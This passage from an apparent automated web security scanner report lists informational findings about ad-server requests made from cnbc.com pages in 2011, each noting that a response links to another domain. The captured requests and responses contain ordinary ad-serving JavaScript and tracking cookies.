B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/466318" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/466318"/></a>
...[SNIP]...

19.14. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=913041004911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:03:36 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/5912867?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/5912867" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/5912867"/></a>
...[SNIP]...

19.15. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=819761534221? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 14:56:39 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/7067761?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/7067761" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/7067761"/></a>
...[SNIP]...

19.16. http://ad.doubleclick.net/adj/nbcu.cnbc/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/search

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=478950738499? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 42850
Date: Tue, 06 Sep 2011 15:00:20 GMT

var divid='dclkAdsDivID_26537';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_26537 = "<html><head></head><body leftMargin=\"0\" topMargin=\"0\" marginwidth=\"0\" marginheight=\"0\">
...[SNIP]...
all%2526keywords%253Dxss%2526categories%253Dexclude%26hl%3Den%26client%3Dca-pub-5672557457834454%26adU%3Dgoogle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGuSCiHBeUEF7YWYU4QbiFDKY0j0Q\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...

19.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7865964?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:10:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L; expires=Fri, 07-Oct-2011 15:10:44 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 751

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Logo.png" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

19.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/6673089?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:21:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2; expires=Fri, 07-Oct-2011 15:21:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

19.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/6546395?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:26:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2; expires=Fri, 07-Oct-2011 15:26:13 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 747

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_New$7.png" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

19.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7828836?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:31:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2; expires=Fri, 07-Oct-2011 15:31:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 751

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Logo.png" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

19.21. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7171989?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:36:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2; expires=Fri, 07-Oct-2011 15:36:28 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

19.22. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/600712?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:41:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2; expires=Fri, 07-Oct-2011 15:41:36 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

19.23. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/409603?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:51:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2; expires=Fri, 07-Oct-2011 15:51:53 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 753

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_0Setup.png" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

19.24. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/719556?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:57:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2; expires=Fri, 07-Oct-2011 15:57:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 766

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/MF-Static_Diversification 120x60.gif" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

19.25. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/2609121?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 16:02:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2; expires=Fri, 07-Oct-2011 16:02:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 747

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_New$7.png" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

19.26. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
